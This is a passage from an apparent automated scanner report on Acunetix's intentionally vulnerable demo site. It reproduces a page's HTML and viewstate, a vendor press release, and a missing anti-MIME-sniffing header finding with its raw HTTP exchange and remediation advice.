VjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4+8K4F/0js11lBw12IN/OFdqHcc=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpz/fHDgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q90tjPbD69UwpHdROB4Qqxfz1aHXA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        17. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17827
          
          
          Response body (17827 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdG